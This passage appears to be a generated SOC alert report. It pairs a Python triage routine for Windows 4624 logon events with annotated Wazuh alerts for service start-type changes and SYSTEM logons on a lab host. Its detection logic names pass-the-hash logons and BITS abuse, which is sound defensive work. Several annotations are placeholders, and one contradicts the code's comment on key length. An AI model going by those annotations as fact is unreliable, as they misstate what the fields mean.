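    "logonProcessName": "Advapi", "authenticationPackageName": "Negotiate",
    "logonGuid": "{00000000-0000-0000-0000-000000000000}", "keyLength": "0",
    "processId": "0x304", "processName": "C:\\Windows\\System32\\services.exe",
    "impersonationLevel": "%%1833", "virtualAccount": "%%1843", "targetLinkedLogonId": "0x0",
    "elevatedToken": "%%1842",
}


def decode_4624(ev):
    """Translate the raw eventdata values into analyst-readable fields."""
    return {
        "logon_type": LOGON_TYPES.get(ev.get("logonType"), "Unknown(%s)" % ev.get("logonType")),
        "impersonation": RESOURCE_STRINGS.get(ev.get("impersonationLevel"), ev.get("impersonationLevel")),
        "elevated": RESOURCE_STRINGS.get(ev.get("elevatedToken")) == "Yes",
        "virtual_account": RESOURCE_STRINGS.get(ev.get("virtualAccount")) == "Yes",
        "process": ntpath.basename(ev.get("processName", "")).lower(),
        "session_key": ev.get("keyLength", "0") != "0",   # keyLength 0 = no session key requested
        "source": ev.get("ipAddress", "-"),                 # absent or "-" on local logons
    }


def triage_4624(ev, computer):
    """Decide whether a 4624 is expected background activity or needs an analyst.
    `computer` is data.win.system.computer, used to recognise the local machine account."""
    d = decode_4624(ev)
    subject_is_machine = ev.get("subjectUserName", "").upper() == computer.upper() + "$"
    target_is_system = ev.get("targetUserSid") == LOCAL_SYSTEM_SID
    reasons = []
    if d["logon_type"] == "Service":
        if subject_is_machine and target_is_system and d["process"] == "services.exe":
            verdict = "expected"
            reasons.append("SCM (services.exe) started a service as LocalSystem under the machine account")
        else:
            verdict = "review"
            reasons.append("service logon for %s\\%s requested by %s; confirm the service and its account"
                           % (ev.get("targetDomainName"), ev.get("targetUserName"), d["process"] or "?"))
    elif d["logon_type"] == "NewCredentials":
        verdict = "review"
        reasons.append("runas /netonly style logon; also produced by pass-the-hash tooling")
    elif d["logon_type"] in ("Network", "RemoteInteractive", "NetworkCleartext"):
        verdict = "review"
        reasons.append("%s logon from %s for %s" % (d["logon_type"], d["source"], ev.get("targetUserName")))
    else:
        verdict = "review"
        reasons.append("%s logon for %s" % (d["logon_type"], ev.get("targetUserName")))
    if d["elevated"] and d["logon_type"] in ("Interactive", "RemoteInteractive"):
        reasons.append("elevated token on an interactive session: administrative logon")
    if not d["session_key"]:
        reasons.append("keyLength 0: no session key requested, normal for local logons")
    return {"verdict": verdict, "decoded": d, "reasons": reasons}


if __name__ == "__main__":
    result = triage_4624(SAMPLE_4624, computer="Attacker")
    print(result["verdict"], result["decoded"]["logon_type"], "|", "; ".join(result["reasons"]))
```

The machine-account check compares subjectUserName with data.win.system.computer plus "$" rather than trusting the SID alone, because a type 5 logon for SYSTEM requested by something other than services.exe (or from a session that is not the local machine account) is exactly the case that should not be auto-closed.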

Service startup type was changed

🧠 What happened? Service startup type was changed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:44.139+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:44.139+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Service startup type was changed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  61104
Numeric ID of the detection rule that fired.

rule.info:  This does not appear to be logged on Windows 2000
Rule author's note inherited from the OSSEC ruleset: Windows 2000 does not write event 7040. Informational only.

rule.firedtimes:  7
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_system', 'policy_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.1', 'CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533904.241675
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Service Control Manager
ETW provider that wrote the event: Service Control Manager (services.exe), which owns service configuration.

data.win.system.providerGuid:  {555908d1-a6d7-4695-8e1e-26931d2012f4}
GUID of that provider; stable across hosts and locales, so prefer it over the display name in saved queries.

data.win.system.eventSourceName:  Service Control Manager
Legacy (pre-ETW) event source name; identical to the provider for SCM events.

data.win.system.eventID:  7040
Classic Windows Event ID (4624, 4688, etc.). 7040 = a service's start type was changed. Learn the big ones!

data.win.system.version:  0
Schema version of the event layout; 7040 has only version 0.

data.win.system.level:  4
Numeric level: 4 = Information (1 Critical, 2 Error, 3 Warning, 5 Verbose).

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.). 0 = no category.

data.win.system.opcode:  0
Low-level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8080000000000000
Bit-flag keywords set by Windows. 0x8080000000000000 = "Classic", the keyword of legacy event sources.

data.win.system.systemTime:  2025-04-20T01:55:22.6696087Z
UTC time the endpoint wrote the event: 40 seconds after the TrustedInstaller changes above, and more than four days before the alert timestamp. Order events by systemTime.

data.win.system.eventRecordID:  2951
Incremental log record number – handy for timeline order. Next in sequence after records 2949 and 2950.

data.win.system.processID:  772
PID of the logging process (services.exe).

data.win.system.threadID:  10448
Thread inside that process; the same worker thread that wrote record 2949.

data.win.system.channel:  System
Event log the record lives in.

data.win.system.computer:  Attacker
Hostname as recorded by Windows; should match agent.name.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "The start type of the Background Intelligent Transfer Service service was changed from auto start to demand start."
Rendered 7040 text: which service, its old start type and its new one. Same values as param1–param4 below.

data.win.eventdata.param1:  Background Intelligent Transfer Service
Display name of the service whose configuration changed.

data.win.eventdata.param2:  auto start
Previous start type.

data.win.eventdata.param3:  demand start
New start type. Demand start does not stop the service from running; it only changes whether it starts at boot.

data.win.eventdata.param4:  BITS
Short (registry) name of the service. BITS is the transfer service Windows Update relies on, so its start type moving alongside TrustedInstaller's within the same minute fits servicing activity. BITS is also abused for download and persistence (T1197), so if the update history does not explain this, list the BITS jobs on the host and look for new ones.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Service startup type was changed

🧠 What happened? Service startup type was changed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:44.228+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:44.228+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Service startup type was changed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  61104
Numeric ID of the detection rule that fired.

rule.info:  This does not appear to be logged on Windows 2000
Rule author's note inherited from the OSSEC ruleset: Windows 2000 does not write event 7040. Informational only.

rule.firedtimes:  8
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_system', 'policy_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.1', 'CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533904.243487
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Service Control Manager
ETW provider that wrote the event: Service Control Manager (services.exe), which owns service configuration.

data.win.system.providerGuid:  {555908d1-a6d7-4695-8e1e-26931d2012f4}
GUID of that provider; stable across hosts and locales, so prefer it over the display name in saved queries.

data.win.system.eventSourceName:  Service Control Manager
Legacy (pre-ETW) event source name; identical to the provider for SCM events.

data.win.system.eventID:  7040
Classic Windows Event ID (4624, 4688, etc.). 7040 = a service's start type was changed. Learn the big ones!

data.win.system.version:  0
Schema version of the event layout; 7040 has only version 0.

data.win.system.level:  4
Numeric level: 4 = Information (1 Critical, 2 Error, 3 Warning, 5 Verbose).

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.). 0 = no category.

data.win.system.opcode:  0
Low-level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8080000000000000
Bit-flag keywords set by Windows. 0x8080000000000000 = "Classic", the keyword of legacy event sources.

data.win.system.systemTime:  2025-04-20T01:55:28.8016634Z
UTC time the endpoint wrote the event: six seconds after the BITS change and about a minute after the first TrustedInstaller change, all more than four days before the alert timestamp. Order events by systemTime.

data.win.system.eventRecordID:  2952
Incremental log record number – handy for timeline order. Last of the four consecutive 7040 records (2949–2952) on this page.

data.win.system.processID:  772
PID of the logging process (services.exe).

data.win.system.threadID:  10448
Thread inside that process; the same worker thread that wrote records 2949 and 2951.

data.win.system.channel:  System
Event log the record lives in.

data.win.system.computer:  Attacker
Hostname as recorded by Windows; should match agent.name.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "The start type of the Windows Modules Installer service was changed from auto start to demand start."
Rendered 7040 text. Same change as record 2949, repeated after the service had been set back to auto start in between: auto → demand → auto → demand within a minute.

data.win.eventdata.param1:  Windows Modules Installer
Display name of the service whose configuration changed.

data.win.eventdata.param2:  auto start
Previous start type.

data.win.eventdata.param3:  demand start
New start type. Treat the four 7040 alerts on this page as one episode and close them together once the servicing activity at 01:54–01:55 is confirmed on the host; escalate only if nothing on the endpoint accounts for it.

data.win.eventdata.param4:  TrustedInstaller
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human-readable reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:44.262+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:44.262+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  20
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533904.245267
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:40:38.6466082Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43521
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  8104
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human-readable reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:44.594+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:44.594+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  21
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533904.252603
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:40:39.5684739Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43523
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  8104
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human-readable reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:44.889+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:44.889+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  22
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533904.259939
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

